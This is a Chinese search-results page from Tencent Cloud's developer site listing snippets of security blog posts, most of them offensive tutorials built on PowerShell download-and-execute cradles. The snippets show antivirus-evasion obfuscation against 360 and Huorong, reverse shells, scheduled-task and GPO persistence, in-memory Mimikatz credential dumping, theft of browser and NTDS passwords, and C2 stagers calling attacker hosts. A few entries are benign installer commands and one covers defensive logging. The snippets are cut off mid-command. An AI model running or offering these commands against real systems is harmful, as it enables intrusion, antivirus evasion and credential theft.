- 综合排序
- 最热优先
- 最新优先
- 来自专栏七夜安全博客
APT的思考: PowerShell命令混淆高级对抗
Invoke-Expression (New-Object System.Net.WebClient).DownloadString(('ht'+'tp:'+'//127.0'+'.0.1:88'+'9 Invoke-Expression (New-Object System.Net.WebClient).DownloadString(("{0}{4}{1}{6}{3}{7}{2}{8}{5}"-f ' DownloadString"("http://127.0.0.1:8899/qiye.txt") 3.4 Invoke Invoke本来不应该放到这的,但是发现也没有什么好位置,就随意一下,放这吧。 ("DownloadString").Invoke("http://127.0.0.1:8899/qiye.txt") 4. 变量变换 4.1 拼接与替换 将关键字拆分成多个变量,然后替换拼接。 ") 4.2 动态变量生成 以构建DownloadString 为例,通过遍历函数并模糊匹配的方式找到DownloadString ,用到了PsObject.Methods 和Where-Object。
7.1K52发布于 2020-06-05 - 来自专栏潇湘信安
powershell上对抗360与火绒的技巧
powershell免杀绕过360与火绒上线 powershell免杀绕过思路参考: 安全客原始payload Invoke-Expression (New-Object Net.WebClient).DownloadString ('http:9821.ink/xxx') 将http分开+号连接 Invoke-Expression(New-Object Net.WebClient).DownloadString("ht"+"tp ://9821.ink/xxx") 变量代替 IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx') 原命令: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20 DownloadString"('ht‘+’tp://192.168.12.20:80/a')" 可以看到修改后的命令,对执行的命令进行替换,并将http分开+号连接的思路,便可以达到免杀上线效果。
2.3K31发布于 2021-07-28 - 来自专栏潇湘信安
sqlps.exe白名单的利用(过S60!)
exploit(multi/handler) > exploit sqlps执行上线: SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring 已被拦截: powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 /360.ps1'))" SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 绕过方式: SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/ 360.ps1'))" cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120
1.5K10编辑于 2022-04-01 - 来自专栏中国白客联盟
渗透测试中常用powershell(一)
whoami desktop-ej8rt6l\jumbo 导出rdp/winscp/putty/FileZilla会话与密码 powershell IEX (New-Object Net.WebClient).DownloadString /SessionGopher.ps1');Invoke-SessionGopher -Thorough 抓取密码 powershell "IEX (New-Object Net.WebClient).DownloadString NC反弹 powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com 拷贝system/ntds powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com nishang/master/Gather/Copy-VSS.ps1'); Copy-VSS" 获取浏览器保存的密码 powershell "IEX (New-Object Net.WebClient).DownloadString
2.1K40发布于 2019-03-07 - 来自专栏信安之路
利用计划任务维持系统权限
powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring
1.4K30发布于 2021-05-27 - 来自专栏FreeBuf
Powershell免杀从入门到实践
我们可以将两种方式混用来实现简单的bypass 如: echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxx.xxx.xxx /a') | powershell - 如: powershell -c "IEX(New-Object Net.WebClient).DownloadString('d://a')" 简单混淆 powershell ('http://xxx.xxx.xxx/a') 处理downloadstring 使用转义符 "Down`l`oadString" 处理http 以变量的方式拆分http powershell "$a ='((new-object net.webclient).downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)" 以中文单引号分割 DownloadString"('ht‘+’tp://xx.xx.xx/a')" 这里再分享一个小技巧: 在测试对抗某些杀毒软件时,发现对cmd下操作查杀比较严格,相对来说powershell环境下更容易
3.3K30发布于 2021-03-09 - 来自专栏FreeBuf
如何通过用户的编辑权限控制组策略对象(GPO)控制的对象
StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring
1.8K20编辑于 2023-04-26 - 来自专栏Ms08067安全实验室
通过计划任务实现持续性攻击
powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring
1.5K30发布于 2020-11-11 win10安装wget及“未能创建SSL/TLS安全通道”解决方案
NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString 运行下面代码: @powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString
24410编辑于 2026-01-23- 来自专栏Bypass
利用计划任务进行权限维持的几种姿势
powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring
3.3K20发布于 2019-11-07 - 来自专栏网络安全攻防
Windows环境下反弹shell各类姿势
python2 -m SimpleHTTPServer 1234 Step 3:目标机反弹cmdshell powershell IEX (New-Object System.Net.Webclient).DownloadString python托管文件 python2 -m SimpleHTTPServer 1234 Step 3:反弹shell操作 powershell IEX (New-Object Net.WebClient).DownloadString python托管文件 python2 -m SimpleHTTPServer 1234 Step 3:反弹shell操作 powershell IEX (New-Object Net.WebClient).DownloadString 192.168.204.144 192.168.204.145 #开启监听 Step 3:反弹shell操作 powershell IEX (New-Object Net.WebClient).DownloadString
2.2K11编辑于 2025-01-07 - 来自专栏FreeBuf
实战中如何绕过杀软用mimikatz获取账号密码
未混淆文件传上去就会被杀并弹窗,所以采用远程加载方法绕过,远程加载方法会在内存中运行mimikatz,无文件落地由此来绕过杀软 powershell "IEX (New-ObjectNet.WebClient).DownloadString 在判断PowerShell下载攻击后,接下来一段时间会直接对powershell拒绝访问,实战直接执行下面的命令) powershell "IEX (New-ObjectNet.WebClient).DownloadString 进内存以无文件落地方式绕过杀软读取账号密码(绕过PowerShell下载攻击弹窗方式同上),命令如下 powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString
2K20发布于 2020-04-24 - 来自专栏betasec
反弹shell | 反弹shell总结
攻击者监听: Nc –lvnp 目标机反弹CMD: powershell IEX (New-Object System.Net.Webclient).DownloadString('https:// powercat -c 192.168.1.4 -p -e cmd 或者在攻击者端执行下面的代码: powershell IEX (New-Object System.Net.Webclient).DownloadString hash值 ...... 2.2.1 基于TCP的Powershell交互式shell 在目标机上执行如下的代码: powershell IEX (New-Object Net.WebClient).DownloadString 9999 注意:可将nishang下载到攻击者本地,执行如下的代码(此时推荐使用python搭建简易WEB服务): powershell IEX (New-Object Net.WebClient).DownloadString 192.168.1.18:9889/test step 3:在目标机上执行powershell下载脚本 powershell IEX (New-Object System.Net.Webclient).DownloadString
4.1K21编辑于 2022-12-11 - 来自专栏FreeBuf
Octopus:专为红队设计的安全研究预操作C2服务器
generate_powershell operation1 #==================== 1) powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString 192.168.178.1:8080/page.php');" 2) powershell -w hidden "Invoke-Expression (New-Object Net.WebClient).DownloadString ('http://192.168.178.1:8080/page.php');" 3) powershell -w hidden "$w = (New-Object Net.WebClient).DownloadString e.g. powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString
1.1K10编辑于 2023-03-30 - 来自专栏betasec
反弹shell的学习总结 - Part 1
攻击者监听: Nc –lvnp 9999 目标机反弹CMD: powershell IEX (New-Object System.Net.Webclient).DownloadString('https 或者在攻击者端执行下面的代码: powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com hash值 ...... 2.2.1 基于TCP的Powershell交互式shell 在目标机上执行如下的代码: powershell IEX (New-Object Net.WebClient).DownloadString 注意:可将nishang下载到攻击者本地,执行如下的代码(此时推荐使用python搭建简易WEB服务): powershell IEX (New-Object Net.WebClient).DownloadString 2.2.2 基于UDP的Powershell交互式shell powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com
1.4K21发布于 2020-07-31 - 来自专栏betasec
内网渗透 | 全网最实用的反弹shell总结
system32\cmd.exe #目标主机上执行 (2) powershell反弹 PS C:\WWW> powershell IEX (New-Object System.Net.Webclient).DownloadString 目标机执行powershell payload (5) nishang反弹shell Reverse TCP shell: powershell IEX (New-Object Net.WebClient).DownloadString Reverse -IPAddress 10.1.1.210 -port 1234 Reverse UDP shell: powershell IEX (New-Object Net.WebClient).DownloadString host=xx.xx.xx.xx" --no-cache -e open -e open 目标主机: powershell IEX (New-Object System.Net.Webclient).DownloadString
2.1K10编辑于 2022-12-11 - 来自专栏全栈程序员必看
windows 安装 yarn「建议收藏」
NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString powershell.exe Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString
95830编辑于 2022-08-27 - 来自专栏Khan安全团队
XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行
toString())'> 反弹shell命令 CS生成powershell脚本 powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring )" require('child_process').exec('powershell.exe-nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring
86920发布于 2021-05-28 - 来自专栏FreeBuf
如何利用日志来监控和限制PowerShell攻击活动
中下面的这两种方法使用频率比较高: −(New-object System.net.webclient).DownlodFile() −(New-object System.net.Webclient).DownloadString 除此之外,还有很多利用PowerShell来下载并调用恶意内容的例子: (New-object System.net.Webclient).DownloadString() DownloadString 下面给出的真实场景中的攻击样例: 在这个样例中同时使用了DownloadString()和DownlodFile()这两种方法,其中的DownloadString()方法可从远程主机中下载PHP代码。
3K50发布于 2018-02-26 - 来自专栏Gamma安全实验室
红队技巧-导出凭据和密码
"sekurlsa::logonpasswords full" exit powershell: #读取明文密码 powershell IEX (New-Object Net.WebClient).DownloadString Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts #读取hash powershell IEX (New-Object Net.WebClient).DownloadString 前提:powershell,管理员权限以及以上 命令: powershell “IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com
2.8K10发布于 2021-03-10
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号